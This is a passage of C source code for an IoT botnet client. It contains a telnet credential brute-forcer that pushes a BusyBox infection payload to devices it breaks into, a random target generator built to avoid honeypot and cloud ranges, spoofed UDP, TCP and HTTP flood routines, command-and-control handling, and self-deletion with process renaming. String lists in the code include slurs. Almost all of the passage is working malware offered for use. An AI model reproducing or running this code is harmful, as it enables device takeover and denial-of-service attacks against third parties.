ipState[2] < 139) || //Blazingfast & Nforce (ipState[0] == 185 && ipState[1] == 62 && ipState[2] >= 187 && ipState[2] < 191) || //Blazingfast & Nforce (ipState[0] == 66 && ipState[1] == 150 && ipState[2] >= 120 && ipState[2] < 215) || //Blazingfast & Nforce (ipState[0] == 66 && ipState[1] == 151 && ipState[2] >= 137 && ipState[2] < 139) || //Blazingfast & Nforce (ipState[0] == 64 && ipState[1] == 94 && ipState[2] >= 237 && ipState[2] < 255) || //Blazingfast & Nforce (ipState[0] == 63 && ipState[1] == 251 && ipState[2] >= 19 && ipState[2] < 21) || //Blazingfast & Nforce (ipState[0] == 70 && ipState[1] == 42 && ipState[2] >= 73 && ipState[2] < 75) || //Blazingfast & Nforce (ipState[0] == 74 && ipState[1] == 91 && ipState[2] >= 113 && ipState[2] < 115) || //Blazingfast & Nforce (ipState[0] == 74 && ipState[1] == 201 && ipState[2] >= 56 && ipState[2] < 58) || //Blazingfast & Nforce (ipState[0] == 188 && ipState[1] == 209 && ipState[2] >= 48 && ipState[2] < 53) || //Blazingfast & Nforce (ipState[0] == 188 && ipState[1] == 165) || //OVH (ipState[0] == 149 && ipState[1] == 202) || //OVH (ipState[0] == 151 && ipState[1] == 80) || //OVH (ipState[0] == 164 && ipState[1] == 132) || //OVH (ipState[0] == 176 && ipState[1] == 31) || //OVH (ipState[0] == 167 && ipState[1] == 114) || //OVH (ipState[0] == 178 && ipState[1] == 32) || //OVH (ipState[0] == 178 && ipState[1] == 33) || //OVH (ipState[0] == 37 && ipState[1] == 59) || //OVH (ipState[0] == 37 && ipState[1] == 187) || //OVH (ipState[0] == 46 && ipState[1] == 105) || //OVH (ipState[0] == 51 && ipState[1] == 254) || //OVH (ipState[0] == 51 && ipState[1] == 255) || //OVH (ipState[0] == 5 && ipState[1] == 135) || //OVH (ipState[0] == 5 && ipState[1] == 196) || //OVH (ipState[0] == 5 && ipState[1] == 39) || //OVH (ipState[0] == 91 && ipState[1] == 134) || //OVH (ipState[0] == 104 && ipState[1] == 200 && ipState[2] >= 128 && ipState[2] < 159) || //Total Server Solutions (ipState[0] == 107 && ipState[1] == 152 && ipState[2] >= 96 && ipState[2] < 111) || //Total Server Solutions (ipState[0] == 107 && ipState[1] == 181 && ipState[2] >= 160 && ipState[2] < 189) || //Total Server Solutions (ipState[0] == 172 && ipState[1] == 98 && ipState[2] >= 64 && ipState[2] < 95) || //Total Server Solutions (ipState[0] == 184 && ipState[1] == 170 && ipState[2] >= 240 && ipState[2] < 255) || //Total Server Solutions (ipState[0] == 192 && ipState[1] == 111 && ipState[2] >= 128 && ipState[2] < 143) || //Total Server Solutions (ipState[0] == 192 && ipState[1] == 252 && ipState[2] >= 208 && ipState[2] < 223) || //Total Server Solutions (ipState[0] == 192 && ipState[1] == 40 && ipState[2] >= 56 && ipState[2] < 59) || //Total Server Solutions (ipState[0] == 198 && ipState[1] == 8 && ipState[2] >= 81 && ipState[2] < 95) || //Total Server Solutions (ipState[0] == 199 && ipState[1] == 116 && ipState[2] >= 112 && ipState[2] < 119) || //Total Server Solutions (ipState[0] == 199 && ipState[1] == 229 && ipState[2] >= 248 && ipState[2] < 255) || //Total Server Solutions (ipState[0] == 199 && ipState[1] == 36 && ipState[2] >= 220 && ipState[2] < 223) || //Total Server Solutions (ipState[0] == 199 && ipState[1] == 58 && ipState[2] >= 184 && ipState[2] < 187) || //Total Server Solutions (ipState[0] == 206 && ipState[1] == 220 && ipState[2] >= 172 && ipState[2] < 175) || //Total Server Solutions (ipState[0] == 208 && ipState[1] == 78 && ipState[2] >= 40 && ipState[2] < 43) || //Total Server Solutions (ipState[0] == 208 && ipState[1] == 93 && ipState[2] >= 192 && ipState[2] < 193) || //Total Server Solutions (ipState[0] == 66 && ipState[1] == 71 && ipState[2] >= 240 && ipState[2] < 255) || //Total Server Solutions (ipState[0] == 98 && ipState[1] == 142 && ipState[2] >= 208 && ipState[2] < 223) || //Total Server Solutions (ipState[0] == 107 && ipState[1] >= 20 && ipState[1] < 24) || //Amazon (ipState[0] == 35 && ipState[1] >= 159 && ipState[1] < 183) || //Amazon (ipState[0] == 52 && ipState[1] >= 1 && ipState[1] < 95) || //Amazon (ipState[0] == 52 && ipState[1] >= 95 && ipState[1] < 255) || //Amazon + Microsoft (ipState[0] == 54 && ipState[1] >= 64 && ipState[1] < 95) || //Amazon + Microsoft (ipState[0] == 54 && ipState[1] >= 144 && ipState[1] < 255) || //Amazon + Microsoft (ipState[0] == 13 && ipState[1] >= 52 && ipState[1] < 60) || //Amazon + Microsoft (ipState[0] == 13 && ipState[1] >= 112 && ipState[1] < 115) || //Amazon + Microsoft (ipState[0] == 163 && ipState[1] == 172) || //ONLINE SAS (ipState[0] == 51 && ipState[1] >= 15 && ipState[1] < 255) || //ONLINE SAS (ipState[0] == 79 && ipState[1] == 121 && ipState[2] >= 128 && ipState[2] < 255) || //Some more (ipState[0] == 212 && ipState[1] == 47 && ipState[2] >= 224 && ipState[2] < 255) || //Some more (ipState[0] == 89 && ipState[1] == 34 && ipState[2] >= 96 && ipState[2] < 97) || //Some more (ipState[0] == 219 && ipState[1] >= 216 && ipState[1] < 231) || //Some more (ipState[0] == 23 && ipState[1] >= 94 && ipState[1] < 109) || //Some more (ipState[0] == 178 && ipState[1] >= 62 && ipState[1] < 63) || //Some more (ipState[0] == 106 && ipState[1] >= 182 && ipState[1] < 189) || //Some more (ipState[0] == 106 && ipState[1] >= 184) || //Some more (ipState[0] == 106 && ipState[1] == 105) || //Honeypot (ipState[0] == 34 && ipState[1] >= 245 && ipState[1] < 255) || //Some more (ipState[0] == 87 && ipState[1] >= 97 && ipState[1] < 99) || //Some more (ipState[0] == 86 && ipState[1] == 208) || //Some more (ipState[0] == 86 && ipState[1] == 209) || //Some more (ipState[0] == 193 && ipState[1] == 164) || //Some more (ipState[0] == 120 && ipState[1] >= 103 && ipState[1] < 108) || //Ministry of Education Computer Science (ipState[0] == 188 && ipState[1] == 68) || //Ministry of Education Computer Science (ipState[0] == 78 && ipState[1] == 46) || //Ministry of Education Computer Science (ipState[0] == 224)) { //Multicast ipState[0] = rand() % 223; ipState[1] = rand() % 255; ipState[2] = rand() % 255; ipState[3] = rand() % 255; } char ip[16] = {0}; szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]); return inet_addr(ip); } in_addr_t GRIP(in_addr_t netmask) { in_addr_t tmp = ntohl(ourIP.s_addr) & netmask; return tmp ^ ( rand_cmwc() & ~netmask); } int socket_connect(char *host, in_port_t port) { struct hostent *hp; struct sockaddr_in addr; int on = 1, sock; if ((hp = gethostbyname(host)) == NULL) return 0; bcopy(hp->h_addr, &addr.sin_addr, hp->h_length); addr.sin_port = htons(port); addr.sin_family = AF_INET; sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int)); if (sock == -1) return 0; if (connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1) return 0; return sock; } void botnetTScan(int wait_usec, int maxfds) { //Telnet scanner from prometheus creds to @narcotixx for that int i, res, num_tmps, j; char buf[128], cur_dir; int max = maxfds; fd_set fdset; struct timeval tv; socklen_t lon; int valopt; srand(time(NULL) ^ rand_cmwc()); char line[256]; char* buffer; struct sockaddr_in dest_addr; dest_addr.sin_family = AF_INET; dest_addr.sin_port = htons(23); memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero); buffer = malloc(BUFFER_SIZE + 1); memset(buffer, 0, BUFFER_SIZE + 1); struct telstate_t fds[max]; memset(fds, 0, max * (sizeof(int) + 1)); for(i = 0; i < max; i++) { memset(&(fds[i]), 0, sizeof(struct telstate_t)); fds[i].complete = 1; fds[i].sockbuf = buffer; } for(num_tmps = 0; tmpdirs[++num_tmps] != 0; ); while(1) { for(i = 0; i < max; i++) { if(fds[i].totalTimeout == 0) { fds[i].totalTimeout = time(NULL); } switch(fds[i].state) { case 0: { if(fds[i].complete == 1) { char *tmp = fds[i].sockbuf; memset(&(fds[i]), 0, sizeof(struct telstate_t)); fds[i].sockbuf = tmp; fds[i].ip = GIP(); } else if(fds[i].complete == 0) { fds[i].passwordInd++; fds[i].usernameInd++; if(fds[i].passwordInd == sizeof(passwords) / sizeof(char *)) { fds[i].complete = 1; continue; } if(fds[i].usernameInd == sizeof(usernames) / sizeof(char *)) { fds[i].complete = 1; continue; } } dest_addr.sin_family = AF_INET; dest_addr.sin_port = htons(23); memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero); dest_addr.sin_addr.s_addr = fds[i].ip; fds[i].fd = socket(AF_INET, SOCK_STREAM, 0); if(fds[i].fd == -1) continue; fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK); if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) { reset_telstate(&fds[i]); } else { advance_state(&fds[i], 1); } } break; case 1: { FD_ZERO(&fdset); FD_SET(fds[i].fd, &fdset); tv.tv_sec = 0; tv.tv_usec = wait_usec; res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv); if(res == 1) { lon = sizeof(int); valopt = 0; getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if(valopt) { reset_telstate(&fds[i]); } else { fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK)); advance_state(&fds[i], 2); } continue; } else if(res == -1) { reset_telstate(&fds[i]); continue; } if(fds[i].totalTimeout + 5 < time(NULL)) { reset_telstate(&fds[i]); } } break; case 2: { if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances)) { if(contains_fail(fds[i].sockbuf)) { advance_state(&fds[i], 0); } else { advance_state(&fds[i], 3); } continue; } if(fds[i].totalTimeout + 7 < time(NULL)) { reset_telstate(&fds[i]); } } break; case 3: { if(send(fds[i].fd, usernames[fds[i].usernameInd], strlen(usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]); continue; } if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]); continue; } advance_state(&fds[i], 4); } break; case 4: { if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances)) { if(contains_fail(fds[i].sockbuf)) { advance_state(&fds[i], 0); } else { advance_state(&fds[i], 5); } continue; } if(fds[i].totalTimeout + 3 < time(NULL)) { reset_telstate(&fds[i]); } } break; case 5: { if(send(fds[i].fd, passwords[fds[i].passwordInd], strlen(passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]); continue; } if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]); continue; } advance_state(&fds[i], 6); } break; case 6: { if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances2)) { fds[i].totalTimeout = time(NULL); if(contains_fail(fds[i].sockbuf)) { advance_state(&fds[i], 0); } else if(contains_success(fds[i].sockbuf)) { if(fds[i].complete == 2) { advance_state(&fds[i], 7); } else { botnetPrint(KadenCommStock, "Eragon Bruted -> %s", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]); advance_state(&fds[i], 7); } } else { reset_telstate(&fds[i]); } continue; } if(fds[i].totalTimeout + 7 < time(NULL)) { reset_telstate(&fds[i]); } } break; case 7: { fds[i].totalTimeout = time(NULL); if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) <0); if(send(fds[i].fd, "shell\r\n", 7, MSG_NOSIGNAL) < 0); if(send(fds[i].fd, BusyBoxPayload, strlen(BusyBoxPayload), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]); continue; } if(fds[i].totalTimeout + 25 < time(NULL)) { if(fds[i].complete !=3){ } reset_telstate(&fds[i]); } break; } } } } } void makeRandomStr(unsigned char *buf, int length) { int i = 0; for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65; } unsigned short csum (unsigned short *buf, int count) { register uint64_t sum = 0; while( count > 1 ) { sum += *buf++; count -= 2; } if(count > 0) { sum += *(unsigned char *)buf; } while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); } return (uint16_t)(~sum); } unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) { struct tcp_pseudo { unsigned long src_addr; unsigned long dst_addr; unsigned char zero; unsigned char proto; unsigned short length; } pseudohead; unsigned short total_len = iph->tot_len; pseudohead.src_addr=iph->saddr; pseudohead.dst_addr=iph->daddr; pseudohead.zero=0; pseudohead.proto=IPPROTO_TCP; pseudohead.length=htons(sizeof(struct tcphdr)); int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr); unsigned short *tcp = malloc(totaltcp_len); memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo)); memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr)); unsigned short output = csum(tcp,totaltcp_len); free(tcp); return output; } void SendHTTP(char *method, char *host, in_port_t port, char *path, int timeEnd, int power) { int socket, i, end = time(NULL) + timeEnd, sendIP = 0; char request[512], buffer[1]; for (i = 0; i < power; i++) { sprintf(request, "%s %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n", method, path, host, useragents[(rand() % 36)]); if (fork()) { while (end > time(NULL)) { socket = socket_connect(host, port); if (socket != 0) { write(socket, request, strlen(request)); read(socket, buffer, 1); close(socket); } } exit(0); } } } void SendHTTPHex(char *method, char *host, in_port_t port, char *path, int timeEnd, int power) { int socket, i, end = time(NULL) + timeEnd, sendIP = 0; char request[512], buffer[1], hex_payload[2048]; sprintf(hex_payload, "\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA"); for (i = 0; i < power; i++) { sprintf(request, "%s %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n", method, hex_payload, host, useragents[(rand() % 36)]); if (fork()) { while (end > time(NULL)) { socket = socket_connect(host, port); if (socket != 0) { write(socket, request, strlen(request)); read(socket, buffer, 1); close(socket); } } exit(0); } } } void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize) { iph->ihl = 5; iph->version = 4; iph->tos = 0; iph->tot_len = sizeof(struct iphdr) + packetSize; iph->id = rand_cmwc(); iph->frag_off = 0; iph->ttl = MAXTTL; iph->protocol = protocol; iph->check = 0; iph->saddr = source; iph->daddr = dest; } int sclose(int fd) { if(3 > fd) return 1; close(fd); return 0; } void sendUDP(unsigned char *target, int port, int timeEnd, int spoofit, int packetsize, int pollinterval, int sleepcheck, int sleeptime) { struct sockaddr_in dest_addr; dest_addr.sin_family = AF_INET; if(port == 0) dest_addr.sin_port = rand_cmwc(); else dest_addr.sin_port = htons(port); if(getHost(target, &dest_addr.sin_addr)) return; memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero); register unsigned int pollRegister; pollRegister = pollinterval; if(spoofit == 32) { int sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if(!sockfd) { #ifdef PRINTS botnetPrint(KadenCommStock, "Failed opening raw socket."); #endif return; } unsigned char *buf = (unsigned char *)malloc(packetsize + 1); if(buf == NULL) return; memset(buf, 0, packetsize + 1); makeRandomStr(buf, packetsize); int end = time(NULL) + timeEnd; register unsigned int i = 0; register unsigned int ii = 0; while(1) { sendto(sockfd, buf, packetsize, 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr)); if(i == pollRegister) { if(port == 0) dest_addr.sin_port = rand_cmwc(); if(time(NULL) > end) break; i = 0; continue; } i++; if(ii == sleepcheck) { usleep(sleeptime*1000); ii = 0; continue; } ii++; } } else { int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP); if(!sockfd) { #ifdef PRINTS botnetPrint(KadenCommStock, "Failed opening raw socket."); #endif return; } int tmp = 1; if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0) { #ifdef PRINTS botnetPrint(KadenCommStock, "Failed setting raw headers mode."); #endif return; } int counter = 50; while(counter--) { srand(time(NULL) ^ rand_cmwc()); init_rand(rand()); } in_addr_t netmask; if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) ); else netmask = ( ~((1 << (32 - spoofit)) - 1) ); unsigned char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + packetsize]; struct iphdr *iph = (struct iphdr *)packet; struct udphdr *udph = (void *)iph + sizeof(struct iphdr); makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( GRIP(netmask) ), IPPROTO_UDP, sizeof(struct udphdr) + packetsize); udph->len = htons(sizeof(struct udphdr) + packetsize); udph->source = rand_cmwc(); udph->dest = (port == 0 ? rand_cmwc() : htons(port)); udph->check = 0; makeRandomStr((unsigned char*)(((unsigned char *)udph) + sizeof(struct udphdr)), packetsize); iph->check = csum ((unsigned short *) packet, iph->tot_len); int end = time(NULL) + timeEnd; register unsigned int i = 0; register unsigned int ii = 0; while(1) { sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr)); udph->source = rand_cmwc(); udph->dest = (port == 0 ? rand_cmwc() : htons(port)); iph->id = rand_cmwc(); iph->saddr = htonl( GRIP(netmask) ); iph->check = csum ((unsigned short *) packet, iph->tot_len); if(i == pollRegister) { if(time(NULL) > end) break; i = 0; continue; } i++; if(ii == sleepcheck) { usleep(sleeptime*1000); ii = 0; continue; } ii++; } } } void sendTCP(unsigned char *target, int port, int timeEnd, int spoofit, unsigned char *flags, int packetsize, int pollinterval) { register unsigned int pollRegister; pollRegister = pollinterval; struct sockaddr_in dest_addr; dest_addr.sin_family = AF_INET; if(port == 0) dest_addr.sin_port = rand_cmwc(); else dest_addr.sin_port = htons(port); if(getHost(target, &dest_addr.sin_addr)) return; memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero); int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP); if(!sockfd) { #ifdef PRINTS botnetPrint(KadenCommStock, "Failed opening raw socket."); #endif return; } int tmp = 1; if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0) { #ifdef PRINTS botnetPrint(KadenCommStock, "Failed setting raw headers mode."); #endif return; } in_addr_t netmask; if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) ); else netmask = ( ~((1 << (32 - spoofit)) - 1) ); unsigned char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + packetsize]; struct iphdr *iph = (struct iphdr *)packet; struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr); makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( GRIP(netmask) ), IPPROTO_TCP, sizeof(struct tcphdr) + packetsize); tcph->source = rand_cmwc(); tcph->seq = rand_cmwc(); tcph->ack_seq = 0; tcph->doff = 5; if(!strcmp(flags, "all")) { tcph->syn = 1; tcph->rst = 1; tcph->fin = 1; tcph->ack = 1; tcph->psh = 1; } else { unsigned char *pch = strtok(flags, ","); while(pch) { if(!strcmp(pch, "syn")) { tcph->syn = 1; } else if(!strcmp(pch, "rst")) { tcph->rst = 1; } else if(!strcmp(pch, "fin")) { tcph->fin = 1; } else if(!strcmp(pch, "ack")) { tcph->ack = 1; } else if(!strcmp(pch, "psh")) { tcph->psh = 1; } else { #ifdef PRINTS botnetPrint(KadenCommStock, "Invalid flag \"%s\"", pch); #endif } pch = strtok(NULL, ","); } } tcph->window = rand_cmwc(); tcph->check = 0; tcph->urg_ptr = 0; tcph->dest = (port == 0 ? rand_cmwc() : htons(port)); tcph->check = tcpcsum(iph, tcph); iph->check = csum ((unsigned short *) packet, iph->tot_len); int end = time(NULL) + timeEnd; register unsigned int i = 0; while(1) { sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr)); iph->saddr = htonl( GRIP(netmask) ); iph->id = rand_cmwc(); tcph->seq = rand_cmwc(); tcph->source = rand_cmwc(); tcph->check = 0; tcph->check = tcpcsum(iph, tcph); iph->check = csum ((unsigned short *) packet, iph->tot_len); if(i == pollRegister) { if(time(NULL) > end) break; i = 0; continue; } i++; } } void sendSTD(unsigned char *ip, int port, int secs) { int iSTD_Sock; iSTD_Sock = socket(AF_INET, SOCK_DGRAM, 0); time_t start = time(NULL); struct sockaddr_in sin; struct hostent *hp; hp = gethostbyname(ip); bzero((char*) &sin,sizeof(sin)); bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length); sin.sin_family = hp->h_addrtype; sin.sin_port = port; unsigned int a = 0; while(1){ char *randstrings[] = {"VSzNC0CJti3ouku", "yhJyMAqx7DZa0kg", "1Cp9MEDMN6B5L1K", "miraiMIRAI", "stdflood4", "7XLPHoxkvL", "jmQvYBdRZA", "eNxERkyrfR", "qHjTXcMbzH", "chickennuggets", "ilovecocaine", "666666", "88888888", "0nnf0l20im", "uq7ajzgm0a", "loic", "ParasJhaIsADumbFag", "stdudpbasedflood", "bitcoin1", "password", "encrypted", "suckmyFOUND", "guardiacivil", "2xoJTsbXunuj", "QiMH8CGJyOj9", "abcd1234", "GLEQWXHAJPWM", "ABCDEFGHI", "abcdefghi", "qbotbotnet", "lizardsquad", "aNrjBnTRi", "1QD8ypG86", "IVkLWYjLe", "kadenthegod", "satoriskidsnet"}; char *STD2_STRING = randstrings[rand() % (sizeof(randstrings) / sizeof(char *))]; if (a >= 50) { send(iSTD_Sock, STD2_STRING, STD_PIGZ, 0); connect(iSTD_Sock,(struct sockaddr *) &sin, sizeof(sin)); if (time(NULL) >= start + secs) { close(iSTD_Sock); _exit(0); } a = 0; } a++; } } void processCmd(int argc, unsigned char *argv[]) { if(!strcmp(argv[0], "TELNET")) { if(!strcmp(argv[1], "OFF")) { if(botnetPid == 0) return; kill(botnetPid, 9); botnetPid = 0; } if(!strcmp(argv[1], "ON")) { if(botnetPid != 0) return; uint32_t parent; parent = fork(); int threads = 1000; int timeout = 10; if (parent > 0) { botnetPid = parent; return;} else if(parent == -1) return; botnetTScan(timeout, threads); _exit(0); } } if(!strcmp(argv[0], "UDP")) { if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[5]) == -1 || atoi(argv[5]) > 65536 || atoi(argv[5]) > 65500 || atoi(argv[4]) > 32 || (argc == 7 && atoi(argv[6]) < 1)) { return; } unsigned char *ip = argv[1]; int port = atoi(argv[2]); int time = atoi(argv[3]); int spoofed = atoi(argv[4]); int packetsize = atoi(argv[5]); int pollinterval = (argc > 6 ? atoi(argv[6]) : 1000); int sleepcheck = (argc > 7 ? atoi(argv[7]) : 1000000); int sleeptime = (argc > 8 ? atoi(argv[8]) : 0); if(strstr(ip, ",") != NULL) { unsigned char *hi = strtok(ip, ","); while(hi != NULL) { if(!listFork()) { sendUDP(hi, port, time, spoofed, packetsize, pollinterval, sleepcheck, sleeptime); _exit(0); } hi = strtok(NULL, ","); } } else { if (!listFork()){ sendUDP(ip, port, time, spoofed, packetsize, pollinterval, sleepcheck, sleeptime); _exit(0); } } return; } if(!strcmp(argv[0], "TCP")) { if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[4]) > 32 || (argc > 6 && atoi(argv[6]) < 0) || (argc == 8 && atoi(argv[7]) < 1)) { return; } unsigned char *ip = argv[1]; int port = atoi(argv[2]); int time = atoi(argv[3]); int spoofed = atoi(argv[4]); unsigned char *flags = argv[5]; int pollinterval = argc == 8 ? atoi(argv[7]) : 10; int psize = argc > 6 ? atoi(argv[6]) : 0; if(strstr(ip, ",") != NULL) { unsigned char *hi = strtok(ip, ","); while(hi != NULL) { if(!listFork()) { sendTCP(hi, port, time, spoofed, flags, psize, pollinterval); _exit(0); } hi = strtok(NULL, ","); } } else { if (!listFork()) { sendTCP(ip, port, time, spoofed, flags, psize, pollinterval); _exit(0); } } } if (!strcmp(argv[0], "HTTP")) { // !* HTTP METHOD TARGET PORT PATH TIME POWER // !* HTTP POST/GET/HEAD hackforums.net 80 / 10 100 if (argc < 6 || atoi(argv[3]) < 1 || atoi(argv[5]) < 1) return; if (listFork()) return; SendHTTP(argv[1], argv[2], atoi(argv[3]), argv[4], atoi(argv[5]), atoi(argv[6])); exit(0); } if (!strcmp(argv[0], "HTTPHEX")) { if (argc < 6 || atoi(argv[3]) < 1 || atoi(argv[5]) < 1) return; if (listFork()) return; SendHTTPHex(argv[1], argv[2], atoi(argv[3]), argv[4], atoi(argv[5]), atoi(argv[6])); exit(0); } if(!strcmp(argv[0], "STD")) //STD TARGET PORT TIME { if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1) { return; } unsigned char *ip = argv[1]; int port = atoi(argv[2]); int time = atoi(argv[3]); if(strstr(ip, ",") != NULL) { unsigned char *hi = strtok(ip, ","); while(hi != NULL) { if(!listFork()) { sendSTD(hi, port, time); _exit(0); } hi = strtok(NULL, ","); } } else { if (listFork()) { return; } sendSTD(ip, port, time); _exit(0); } } if(!strcmp(argv[0], "KILLATTK")) { int killed = 0; unsigned long i; for (i = 0; i < numpids; i++) { if (pids[i] != 0 && pids[i] != getpid()) { kill(pids[i], 9); killed++; } } } } int getOurIP() { int sock = socket(AF_INET, SOCK_DGRAM, 0); if(sock == -1) return 0; struct sockaddr_in serv; memset(&serv, 0, sizeof(serv)); serv.sin_family = AF_INET; serv.sin_addr.s_addr = inet_addr("8.8.8.8"); serv.sin_port = htons(53); int err = connect(sock, (const struct sockaddr*) &serv, sizeof(serv)); if(err == -1) return 0; struct sockaddr_in name; socklen_t namelen = sizeof(name); err = getsockname(sock, (struct sockaddr*) &name, &namelen); if(err == -1) return 0; ourIP.s_addr = name.sin_addr.s_addr; int cmdline = open("/proc/net/route", O_RDONLY); char linebuf[4096]; while(fdgets(linebuf, 4096, cmdline) != NULL) { if(strstr(linebuf, "\t00000000\t") != NULL) { unsigned char *pos = linebuf; while(*pos != '\t') pos++; *pos = 0; break; } memset(linebuf, 0, 4096); } close(cmdline); if(*linebuf) { int i; struct ifreq ifr; strcpy(ifr.ifr_name, linebuf); ioctl(sock, SIOCGIFHWADDR, &ifr); for (i=0; i<6; i++) macAddress[i] = ((unsigned char*)ifr.ifr_hwaddr.sa_data)[i]; } close(sock); } int getEndianness(void) { union { uint32_t vlu; uint8_t data[sizeof(uint32_t)]; } nmb; nmb.data[0] = 0x00; nmb.data[1] = 0x01; nmb.data[2] = 0x02; nmb.data[3] = 0x03; switch (nmb.vlu) { case UINT32_C(0x00010203): return "BIG_ENDIAN"; case UINT32_C(0x03020100): return "LITTLE_ENDIAN"; case UINT32_C(0x02030001): return "BIG_ENDIAN_W"; case UINT32_C(0x01000302): return "LITTLE_ENDIAN_W"; default: return "UNKNOWN"; } } int initConnection() { unsigned char server[4096]; memset(server, 0, 4096); if(KadenCommStock) { close(KadenCommStock); KadenCommStock = 0; } if(botnetServer + 1 == SERVER_LIST_SIZE) botnetServer = 0; else botnetServer++; strcpy(server, ServerInfo[botnetServer]); int port = Server_Botport; if(strchr(server, ':') != NULL) { port = atoi(strchr(server, ':') + 1); *((unsigned char *)(strchr(server, ':'))) = 0x0; } KadenCommStock = socket(AF_INET, SOCK_STREAM, 0); if(!connectTimeout(KadenCommStock, server, port, 30)) return 1; return 0; } int main(int argc, unsigned char *argv[]) { char name_buf[32]; char id_buf[32]; int name_buf_len; if(SERVER_LIST_SIZE <= 0) return 0; unlink(argv[0]); rand_init(); name_buf_len = ((rand_next() % 4) + 3) * 4; rand_alphastr(name_buf, name_buf_len); name_buf[name_buf_len] = 0; util_strcpy(argv[0], name_buf); 